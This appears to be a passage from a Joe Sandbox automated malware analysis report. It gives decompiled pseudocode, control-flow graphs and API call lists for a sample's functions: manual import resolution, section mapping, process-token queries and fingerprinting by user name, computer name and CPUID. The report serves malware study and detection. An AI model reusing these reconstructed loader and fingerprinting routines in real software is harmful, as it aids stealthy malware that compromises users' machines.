                                                                                                                                                                                                                                    • memcpy.NTDLL(00000000,?,00000000), ref: 02F914E0
                                                                                                                                                                                                                                    • FindNextFileA.KERNELBASE(02F996C1,?), ref: 02F914F5
                                                                                                                                                                                                                                    • FindClose.KERNEL32(02F996C1), ref: 02F91502
                                                                                                                                                                                                                                    • FindFirstFileA.KERNEL32(?,?), ref: 02F9150E
                                                                                                                                                                                                                                    • CompareFileTime.KERNEL32(?,?), ref: 02F9151E
                                                                                                                                                                                                                                    • FindClose.KERNELBASE(02F996C1), ref: 02F91553
                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,00000000,73797325), ref: 02F91565
                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,?), ref: 02F91575
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.523875245.0000000002F91000.00000020.00020000.sdmp, Offset: 02F90000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.523858661.0000000002F90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524004271.0000000002F9C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524048885.0000000002F9D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524106649.0000000002F9F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f90000_loaddll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: File$Find$CloseHeapTime$CompareFirst$AllocateEnvironmentExpandFreeNextStrings$ChangeCreateNotificationlstrcatmemcpymemset
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2944988578-0
                                                                                                                                                                                                                                    • Opcode ID: d2a73650bd19401bbb9cffb344c5e7ff7741a0d8dd49bc176e8ac53c03a6749f
                                                                                                                                                                                                                                    • Instruction ID: 3dd0f2978778f760728f5df8e2b859c6519b123561035cd1f2921414cc3c1535
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d2a73650bd19401bbb9cffb344c5e7ff7741a0d8dd49bc176e8ac53c03a6749f
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 16815BB2D0010AAFEF21DFA5DC44AEFBBB9FB49780F110566E609E6250D7319A54CF60
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 0040102F, Relevance: 13.6, APIs: 9, Instructions: 81filetimeCOMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 204 40102f-401086 GetSystemTimeAsFileTime _aulldiv _snwprintf 205 401088 204->205 206 40108d-4010a6 CreateFileMappingW 204->206 205->206 207 4010f0-4010f6 GetLastError 206->207 208 4010a8-4010b1 206->208 211 4010f8-4010fe 207->211 209 4010c1-4010cf MapViewOfFile 208->209 210 4010b3-4010ba GetLastError 208->210 213 4010d1-4010dd 209->213 214 4010df-4010e5 GetLastError 209->214 210->209 212 4010bc-4010bf 210->212 215 4010e7-4010ee CloseHandle 212->215 213->211 214->211 214->215 215->211
                                                                                                                                                                                                                                    C-Code - Quality: 69%
                                                                                                                                                                                                                                    			E0040102F(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
				intOrPtr _v12;
				struct _FILETIME* _v16;
				short _v60;
				struct _FILETIME* _t14;
				intOrPtr _t15;
				long _t18;
				void* _t19;
				void* _t22;
				intOrPtr _t31;
				long _t32;
				void* _t34;

				_t31 = __edx;
				_t14 =  &_v16;
				GetSystemTimeAsFileTime(_t14);
				_push(0x192);
				_push(0x54d38000);
				_push(_v12);
				_push(_v16);
				L00402100();
				_push(_t14);
				_v16 = _t14;
				_t15 =  *0x404150;
				_push(_t15 + 0x40505e);
				_push(_t15 + 0x405054);
				_push(0x16);
				_push( &_v60);
				_v12 = _t31;
				L004020FA();
				_t18 = _a4;
				if(_t18 == 0) {
					_t18 = 0x1000;
				}
				_t19 = CreateFileMappingW(0xffffffff, 0x404140, 4, 0, _t18,  &_v60); // executed
				_t34 = _t19;
				if(_t34 == 0) {
					_t32 = GetLastError();
				} else {
					if(_a4 != 0 || GetLastError() == 0xb7) {
						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
						if(_t22 == 0) {
							_t32 = GetLastError();
							if(_t32 != 0) {
								goto L9;
							}
						} else {
							 *_a8 = _t34;
							 *_a12 = _t22;
							_t32 = 0;
						}
					} else {
						_t32 = 2;
						L9:
						CloseHandle(_t34);
					}
				}
				return _t32;
			}














                                                                                                                                                                                                                                    0x0040102f
                                                                                                                                                                                                                                    0x00401038
                                                                                                                                                                                                                                    0x0040103c
                                                                                                                                                                                                                                    0x00401042
                                                                                                                                                                                                                                    0x00401047
                                                                                                                                                                                                                                    0x0040104c
                                                                                                                                                                                                                                    0x0040104f
                                                                                                                                                                                                                                    0x00401052
                                                                                                                                                                                                                                    0x00401057
                                                                                                                                                                                                                                    0x00401058
                                                                                                                                                                                                                                    0x0040105b
                                                                                                                                                                                                                                    0x00401066
                                                                                                                                                                                                                                    0x0040106d
                                                                                                                                                                                                                                    0x00401071
                                                                                                                                                                                                                                    0x00401073
                                                                                                                                                                                                                                    0x00401074
                                                                                                                                                                                                                                    0x00401077
                                                                                                                                                                                                                                    0x0040107c
                                                                                                                                                                                                                                    0x00401086
                                                                                                                                                                                                                                    0x00401088
                                                                                                                                                                                                                                    0x00401088
                                                                                                                                                                                                                                    0x0040109c
                                                                                                                                                                                                                                    0x004010a2
                                                                                                                                                                                                                                    0x004010a6
                                                                                                                                                                                                                                    0x004010f6
                                                                                                                                                                                                                                    0x004010a8
                                                                                                                                                                                                                                    0x004010b1
                                                                                                                                                                                                                                    0x004010c7
                                                                                                                                                                                                                                    0x004010cf
                                                                                                                                                                                                                                    0x004010e1
                                                                                                                                                                                                                                    0x004010e5
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004010d1
                                                                                                                                                                                                                                    0x004010d4
                                                                                                                                                                                                                                    0x004010d9
                                                                                                                                                                                                                                    0x004010db
                                                                                                                                                                                                                                    0x004010db
                                                                                                                                                                                                                                    0x004010bc
                                                                                                                                                                                                                                    0x004010be
                                                                                                                                                                                                                                    0x004010e7
                                                                                                                                                                                                                                    0x004010e8
                                                                                                                                                                                                                                    0x004010e8
                                                                                                                                                                                                                                    0x004010b1
                                                                                                                                                                                                                                    0x004010fe

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 0040103C
                                                                                                                                                                                                                                    • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 00401052
                                                                                                                                                                                                                                    • _snwprintf.NTDLL ref: 00401077
                                                                                                                                                                                                                                    • CreateFileMappingW.KERNELBASE(000000FF,00404140,00000004,00000000,?,?), ref: 0040109C
                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 004010B3
                                                                                                                                                                                                                                    • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 004010C7
                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 004010DF
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 004010E8
                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 004010F0
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.512650162.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.512935351.0000000000405000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_loaddll32.jbxd
                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1724014008-0
                                                                                                                                                                                                                                    • Opcode ID: 237bd4267b8507ef2e770013a7e9044532c0ed1270bd501eb3486a71b066fa40
                                                                                                                                                                                                                                    • Instruction ID: 61cdcec85cecdffe8ab43489883bfa6cdd29d31204b6cddf744d864112287dc7
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 237bd4267b8507ef2e770013a7e9044532c0ed1270bd501eb3486a71b066fa40
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1D21D3B2500148BFD710AFA8DC89EEE7BADEB48355F108036F615F72E0D67499858B68
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 02F9269C, Relevance: 12.1, APIs: 8, Instructions: 102memoryCOMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 225 2f9269c-2f926b0 226 2f926ba-2f926cc call 2f96b43 225->226 227 2f926b2-2f926b7 225->227 230 2f926ce-2f926de GetUserNameW 226->230 231 2f92720-2f9272d 226->231 227->226 232 2f9272f-2f92746 GetComputerNameW 230->232 233 2f926e0-2f926f0 RtlAllocateHeap 230->233 231->232 234 2f92748-2f92759 RtlAllocateHeap 232->234 235 2f92784-2f927a6 232->235 233->232 236 2f926f2-2f926ff GetUserNameW 233->236 234->235 237 2f9275b-2f92764 GetComputerNameW 234->237 238 2f9270f-2f9271e HeapFree 236->238 239 2f92701-2f9270d call 2f92496 236->239 240 2f92775-2f9277e HeapFree 237->240 241 2f92766-2f92772 call 2f92496 237->241 238->232 239->238 240->235 241->240
                                                                                                                                                                                                                                    C-Code - Quality: 96%
                                                                                                                                                                                                                                    			E02F9269C(char __eax, signed int* __esi) {
				long _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v28;
				long _t34;
				signed int _t39;
				long _t50;
				char _t59;
				intOrPtr _t61;
				void* _t62;
				void* _t63;
				signed int* _t64;
				char _t65;
				intOrPtr* _t67;
				void* _t68;
				signed int* _t69;

				_t69 = __esi;
				_t65 = __eax;
				_v8 = 0;
				_v12 = __eax;
				if(__eax == 0) {
					_t59 =  *0x2f9d270; // 0xd448b889
					_v12 = _t59;
				}
				_t64 = _t69;
				E02F96B43( &_v12, _t64);
				if(_t65 != 0) {
					 *_t69 =  *_t69 ^  *0x2f9d278 ^ 0x4c0ca0ae;
				} else {
					GetUserNameW(0,  &_v8); // executed
					_t50 = _v8;
					if(_t50 != 0) {
						_t62 = RtlAllocateHeap( *0x2f9d238, 0, _t50 + _t50);
						if(_t62 != 0) {
							if(GetUserNameW(_t62,  &_v8) != 0) {
								_t63 = _t62;
								 *_t69 =  *_t69 ^ E02F92496(_v8 + _v8, _t63);
							}
							HeapFree( *0x2f9d238, 0, _t62);
						}
					}
				}
				_t61 = __imp__;
				_v8 = _v8 & 0x00000000;
				GetComputerNameW(0,  &_v8);
				_t34 = _v8;
				if(_t34 != 0) {
					_t68 = RtlAllocateHeap( *0x2f9d238, 0, _t34 + _t34);
					if(_t68 != 0) {
						if(GetComputerNameW(_t68,  &_v8) != 0) {
							_t63 = _t68;
							_t69[3] = _t69[3] ^ E02F92496(_v8 + _v8, _t63);
						}
						HeapFree( *0x2f9d238, 0, _t68);
					}
				}
				asm("cpuid");
				_t67 =  &_v28;
				 *_t67 = 1;
				 *((intOrPtr*)(_t67 + 4)) = _t61;
				 *(_t67 + 8) = _t63;
				 *(_t67 + 0xc) = _t64;
				_t39 = _v16 ^ _v20 ^ _v28;
				_t69[1] = _t69[1] ^ _t39;
				return _t39;
			}




















                                                                                                                                                                                                                                    0x02f9269c
                                                                                                                                                                                                                                    0x02f926a4
                                                                                                                                                                                                                                    0x02f926aa
                                                                                                                                                                                                                                    0x02f926ad
                                                                                                                                                                                                                                    0x02f926b0
                                                                                                                                                                                                                                    0x02f926b2
                                                                                                                                                                                                                                    0x02f926b7
                                                                                                                                                                                                                                    0x02f926b7
                                                                                                                                                                                                                                    0x02f926bd
                                                                                                                                                                                                                                    0x02f926bf
                                                                                                                                                                                                                                    0x02f926cc
                                                                                                                                                                                                                                    0x02f9272d
                                                                                                                                                                                                                                    0x02f926ce
                                                                                                                                                                                                                                    0x02f926d3
                                                                                                                                                                                                                                    0x02f926d9
                                                                                                                                                                                                                                    0x02f926de
                                                                                                                                                                                                                                    0x02f926ec
                                                                                                                                                                                                                                    0x02f926f0
                                                                                                                                                                                                                                    0x02f926ff
                                                                                                                                                                                                                                    0x02f92706
                                                                                                                                                                                                                                    0x02f9270d
                                                                                                                                                                                                                                    0x02f9270d
                                                                                                                                                                                                                                    0x02f92718
                                                                                                                                                                                                                                    0x02f92718
                                                                                                                                                                                                                                    0x02f926f0
                                                                                                                                                                                                                                    0x02f926de
                                                                                                                                                                                                                                    0x02f9272f
                                                                                                                                                                                                                                    0x02f92735
                                                                                                                                                                                                                                    0x02f9273f
                                                                                                                                                                                                                                    0x02f92741
                                                                                                                                                                                                                                    0x02f92746
                                                                                                                                                                                                                                    0x02f92755
                                                                                                                                                                                                                                    0x02f92759
                                                                                                                                                                                                                                    0x02f92764
                                                                                                                                                                                                                                    0x02f9276b
                                                                                                                                                                                                                                    0x02f92772
                                                                                                                                                                                                                                    0x02f92772
                                                                                                                                                                                                                                    0x02f9277e
                                                                                                                                                                                                                                    0x02f9277e
                                                                                                                                                                                                                                    0x02f92759
                                                                                                                                                                                                                                    0x02f92787
                                                                                                                                                                                                                                    0x02f92789
                                                                                                                                                                                                                                    0x02f9278c
                                                                                                                                                                                                                                    0x02f9278e
                                                                                                                                                                                                                                    0x02f92791
                                                                                                                                                                                                                                    0x02f92794
                                                                                                                                                                                                                                    0x02f9279e
                                                                                                                                                                                                                                    0x02f927a2
                                                                                                                                                                                                                                    0x02f927a6

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetUserNameW.ADVAPI32(00000000,?), ref: 02F926D3
                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,?), ref: 02F926EA
                                                                                                                                                                                                                                    • GetUserNameW.ADVAPI32(00000000,?), ref: 02F926F7
                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,02F923D9), ref: 02F92718
                                                                                                                                                                                                                                    • GetComputerNameW.KERNEL32(00000000,00000000), ref: 02F9273F
                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 02F92753
                                                                                                                                                                                                                                    • GetComputerNameW.KERNEL32(00000000,00000000), ref: 02F92760
                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,02F923D9), ref: 02F9277E
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.523875245.0000000002F91000.00000020.00020000.sdmp, Offset: 02F90000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.523858661.0000000002F90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524004271.0000000002F9C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524048885.0000000002F9D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524106649.0000000002F9F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f90000_loaddll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: HeapName$AllocateComputerFreeUser
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3239747167-0
                                                                                                                                                                                                                                    • Opcode ID: 71db3f6384662438569d6779dcdfed94a5d4a2fd1970f8467fd7589798aeab48
                                                                                                                                                                                                                                    • Instruction ID: 16254d2c24303e20f678e0edd355844490c5d1f357fb779c3aecc486ac00827a
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 71db3f6384662438569d6779dcdfed94a5d4a2fd1970f8467fd7589798aeab48
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F2311C71A40209EFEB11EF69DC81A6EF7F9EF48780F214869E905E7210D730E9558B11
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 02F983B7, Relevance: 10.6, APIs: 7, Instructions: 81nativeCOMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    C-Code - Quality: 38%
                                                                                                                                                                                                                                    			E02F983B7(char _a4, void* _a8) {
				void* _v8;
				void* _v12;
				char _v16;
				void* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _v44;
				void** _t33;
				void* _t40;
				void* _t43;
				void** _t44;
				intOrPtr* _t47;
				char _t48;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v20 = _a4;
				_t48 = 0;
				_v16 = 0;
				_a4 = 0;
				_v44 = 0x18;
				_v40 = 0;
				_v32 = 0;
				_v36 = 0;
				_v28 = 0;
				_v24 = 0;
				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
					_t33 =  &_v8;
					__imp__(_v12, 8, _t33);
					if(_t33 >= 0) {
						_t47 = __imp__;
						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
						_t44 = E02F92049(_a4);
						if(_t44 != 0) {
							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
							if(_t40 >= 0) {
								memcpy(_a8,  *_t44, 0x1c);
								_t48 = 1;
							}
							E02F99039(_t44);
						}
						NtClose(_v8); // executed
					}
					NtClose(_v12);
				}
				return _t48;
			}



















                                                                                                                                                                                                                                    0x02f983c4
                                                                                                                                                                                                                                    0x02f983c5
                                                                                                                                                                                                                                    0x02f983c6
                                                                                                                                                                                                                                    0x02f983c7
                                                                                                                                                                                                                                    0x02f983c8
                                                                                                                                                                                                                                    0x02f983cc
                                                                                                                                                                                                                                    0x02f983d3
                                                                                                                                                                                                                                    0x02f983e2
                                                                                                                                                                                                                                    0x02f983e5
                                                                                                                                                                                                                                    0x02f983e8
                                                                                                                                                                                                                                    0x02f983ef
                                                                                                                                                                                                                                    0x02f983f2
                                                                                                                                                                                                                                    0x02f983f5
                                                                                                                                                                                                                                    0x02f983f8
                                                                                                                                                                                                                                    0x02f983fb
                                                                                                                                                                                                                                    0x02f98406
                                                                                                                                                                                                                                    0x02f98408
                                                                                                                                                                                                                                    0x02f98411
                                                                                                                                                                                                                                    0x02f98419
                                                                                                                                                                                                                                    0x02f9841b
                                                                                                                                                                                                                                    0x02f9842d
                                                                                                                                                                                                                                    0x02f98437
                                                                                                                                                                                                                                    0x02f9843b
                                                                                                                                                                                                                                    0x02f9844a
                                                                                                                                                                                                                                    0x02f9844e
                                                                                                                                                                                                                                    0x02f98457
                                                                                                                                                                                                                                    0x02f9845f
                                                                                                                                                                                                                                    0x02f9845f
                                                                                                                                                                                                                                    0x02f98461
                                                                                                                                                                                                                                    0x02f98461
                                                                                                                                                                                                                                    0x02f98469
                                                                                                                                                                                                                                    0x02f9846f
                                                                                                                                                                                                                                    0x02f98473
                                                                                                                                                                                                                                    0x02f98473
                                                                                                                                                                                                                                    0x02f9847e

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 02F983FE
                                                                                                                                                                                                                                    • NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 02F98411
                                                                                                                                                                                                                                    • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 02F9842D
                                                                                                                                                                                                                                      • Part of subcall function 02F92049: RtlAllocateHeap.NTDLL(00000000,00000000,02F97E50), ref: 02F92055
                                                                                                                                                                                                                                    • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 02F9844A
                                                                                                                                                                                                                                    • memcpy.NTDLL(00000000,00000000,0000001C), ref: 02F98457
                                                                                                                                                                                                                                    • NtClose.NTDLL(?), ref: 02F98469
                                                                                                                                                                                                                                    • NtClose.NTDLL(00000000), ref: 02F98473
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.523875245.0000000002F91000.00000020.00020000.sdmp, Offset: 02F90000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.523858661.0000000002F90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524004271.0000000002F9C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524048885.0000000002F9D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524106649.0000000002F9F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f90000_loaddll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2575439697-0
                                                                                                                                                                                                                                    • Opcode ID: c6a6e850460f9a648027d9bb6105496546d0b19c0e7efb462de12bb7935b89a6
                                                                                                                                                                                                                                    • Instruction ID: 90fce6438f055e7ac5e35e970b7ed09552c81ecbbf66241b6143c8063bcb3345
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c6a6e850460f9a648027d9bb6105496546d0b19c0e7efb462de12bb7935b89a6
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4A21D4B294021CBBEF119FA5CC45ADEBFBDEF19B94F104026FA04E6120D7719A549FA0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 00401EB5, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70nativeCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 72%
                                                                                                                                                                                                                                    			E00401EB5(intOrPtr* __eax, void** _a4) {
				int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				int _v28;
				int _v32;
				intOrPtr _v36;
				int _v40;
				int _v44;
				void* _v48;
				void* __esi;
				long _t34;
				void* _t39;
				void* _t47;
				intOrPtr* _t48;

				_t48 = __eax;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v24 =  *((intOrPtr*)(__eax + 4));
				_v16 = 0;
				_v12 = 0;
				_v48 = 0x18;
				_v44 = 0;
				_v36 = 0x40;
				_v40 = 0;
				_v32 = 0;
				_v28 = 0;
				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
				if(_t34 < 0) {
					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
				} else {
					 *_t48 = _v16;
					_t39 = E00401D9F(_t48,  &_v12); // executed
					_t47 = _t39;
					if(_t47 != 0) {
						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
					} else {
						memset(_v12, 0, _v24);
						 *_a4 = _v12;
					}
				}
				return _t47;
			}


















                                                                                                                                                                                                                                    0x00401ebe
                                                                                                                                                                                                                                    0x00401ec5
                                                                                                                                                                                                                                    0x00401ec6
                                                                                                                                                                                                                                    0x00401ec7
                                                                                                                                                                                                                                    0x00401ec8
                                                                                                                                                                                                                                    0x00401ec9
                                                                                                                                                                                                                                    0x00401eda
                                                                                                                                                                                                                                    0x00401ede
                                                                                                                                                                                                                                    0x00401ef2
                                                                                                                                                                                                                                    0x00401ef5
                                                                                                                                                                                                                                    0x00401ef8
                                                                                                                                                                                                                                    0x00401eff
                                                                                                                                                                                                                                    0x00401f02
                                                                                                                                                                                                                                    0x00401f09
                                                                                                                                                                                                                                    0x00401f0c
                                                                                                                                                                                                                                    0x00401f0f
                                                                                                                                                                                                                                    0x00401f12
                                                                                                                                                                                                                                    0x00401f17
                                                                                                                                                                                                                                    0x00401f52
                                                                                                                                                                                                                                    0x00401f19
                                                                                                                                                                                                                                    0x00401f1c
                                                                                                                                                                                                                                    0x00401f22
                                                                                                                                                                                                                                    0x00401f27
                                                                                                                                                                                                                                    0x00401f2b
                                                                                                                                                                                                                                    0x00401f49
                                                                                                                                                                                                                                    0x00401f2d
                                                                                                                                                                                                                                    0x00401f34
                                                                                                                                                                                                                                    0x00401f42
                                                                                                                                                                                                                                    0x00401f42
                                                                                                                                                                                                                                    0x00401f2b
                                                                                                                                                                                                                                    0x00401f5a

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,76D24EE0,00000000,00000000,?), ref: 00401F12
                                                                                                                                                                                                                                      • Part of subcall function 00401D9F: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,00401F27,00000002,00000000,?,?,00000000,?,?,00401F27,00000002), ref: 00401DCC
                                                                                                                                                                                                                                    • memset.NTDLL ref: 00401F34
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.512650162.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.512935351.0000000000405000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_loaddll32.jbxd
                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Section$CreateViewmemset
                                                                                                                                                                                                                                    • String ID: @
                                                                                                                                                                                                                                    • API String ID: 2533685722-2766056989
                                                                                                                                                                                                                                    • Opcode ID: ee04d3b80f2aa96c2028224801f0ff00ef799990c629de64b363f9b0c8c139ed
                                                                                                                                                                                                                                    • Instruction ID: 68d8c8f26fc330075f7cb601c6588f33ac635daa3c13fb39122687157e3906a1
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ee04d3b80f2aa96c2028224801f0ff00ef799990c629de64b363f9b0c8c139ed
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 92211DB1D00209AFDB11DFA9C8849EEFBB9FF48354F10447AE606F3250D734AA498B64
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 00401745, Relevance: 3.1, APIs: 2, Instructions: 92libraryloaderCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E00401745(void* __edi, intOrPtr _a4) {
				signed int _v8;
				intOrPtr* _v12;
				_Unknown_base(*)()** _v16;
				signed int _v20;
				signed short _v24;
				struct HINSTANCE__* _v28;
				intOrPtr _t43;
				intOrPtr* _t45;
				intOrPtr _t46;
				struct HINSTANCE__* _t47;
				intOrPtr* _t49;
				intOrPtr _t50;
				signed short _t51;
				_Unknown_base(*)()* _t53;
				CHAR* _t54;
				_Unknown_base(*)()* _t55;
				void* _t58;
				signed int _t59;
				_Unknown_base(*)()* _t60;
				intOrPtr _t61;
				intOrPtr _t65;
				signed int _t68;
				void* _t69;
				CHAR* _t71;
				signed short* _t73;

				_t69 = __edi;
				_v20 = _v20 & 0x00000000;
				_t59 =  *0x40414c;
				_t43 =  *((intOrPtr*)(_a4 + _t59 * 8 - 0x1b4cdd98));
				if(_t43 != 0) {
					_t45 = _t43 + __edi;
					_v12 = _t45;
					_t46 =  *((intOrPtr*)(_t45 + 0xc));
					if(_t46 != 0) {
						while(1) {
							_t71 = _t46 + _t69;
							_t47 = LoadLibraryA(_t71); // executed
							_v28 = _t47;
							if(_t47 == 0) {
								break;
							}
							_v24 = _v24 & 0x00000000;
							 *_t71 = _t59 - 0x63699bc3;
							_t49 = _v12;
							_t61 =  *((intOrPtr*)(_t49 + 0x10));
							_t50 =  *_t49;
							if(_t50 != 0) {
								L6:
								_t73 = _t50 + _t69;
								_v16 = _t61 + _t69;
								while(1) {
									_t51 =  *_t73;
									if(_t51 == 0) {
										break;
									}
									if(__eflags < 0) {
										__eflags = _t51 - _t69;
										if(_t51 < _t69) {
											L12:
											_t21 =  &_v8;
											 *_t21 = _v8 & 0x00000000;
											__eflags =  *_t21;
											_v24 =  *_t73 & 0x0000ffff;
										} else {
											_t65 = _a4;
											__eflags = _t51 -  *((intOrPtr*)(_t65 + 0x50)) + _t69;
											if(_t51 >=  *((intOrPtr*)(_t65 + 0x50)) + _t69) {
												goto L12;
											} else {
												goto L11;
											}
										}
									} else {
										_t51 = _t51 + _t69;
										L11:
										_v8 = _t51;
									}
									_t53 = _v8;
									__eflags = _t53;
									if(_t53 == 0) {
										_t54 = _v24 & 0x0000ffff;
									} else {
										_t54 = _t53 + 2;
									}
									_t55 = GetProcAddress(_v28, _t54);
									__eflags = _t55;
									if(__eflags == 0) {
										_v20 = _t59 - 0x63699b44;
